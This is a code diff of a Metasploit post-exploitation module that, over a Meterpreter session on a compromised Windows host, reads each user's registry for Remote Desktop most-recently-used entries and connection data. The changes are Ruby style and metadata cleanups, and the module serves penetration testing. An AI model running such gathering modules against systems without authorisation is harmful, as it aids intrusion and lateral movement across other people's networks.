@@ -14,12 +14,17 @@ class MetasploitModule < Msf::Post
         info,
         'Name' => 'Windows Gather Terminal Server Client Connection Information Dumper',
         'Description' => %q{
-          This module dumps MRU and connection data for RDP sessions
+          This module dumps MRU and connection data for RDP sessions.
         },
         'License' => MSF_LICENSE,
         'Author' => [ 'mubix' ],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -32,9 +37,9 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-    userhives = load_missing_hives()
+    userhives = load_missing_hives
     userhives.each do |hive|
-      next if hive['HKU'] == nil
+      next if hive['HKU'].nil?
 
       print_status("Doing enumeration for #{hive['SID']}")
       root_key, base_key = session.sys.registry.splitkey("#{hive['HKU']}\\Software\\Microsoft\\Terminal\ Server\ Client")
@@ -44,7 +49,7 @@ class MetasploitModule < Msf::Post
         if tmpkey_values.include?('Default')
           defaultkey = session.sys.registry.open_key(root_key, base_key + '\\Default', KEY_READ)
           print_good('Systems connected to:')
-          (defaultkey.enum_value).each do |x|
+          defaultkey.enum_value.each do |x|
             if x.name =~ /^MRU/
               print_good("--> #{defaultkey.query_value(x.name).data}")
             end
@@ -61,6 +66,7 @@ class MetasploitModule < Msf::Post
           end
         end
       rescue Rex::Post::Meterpreter::RequestError => e
+        vprint_error(e.message)
       end
     end
     unload_our_hives(userhives)
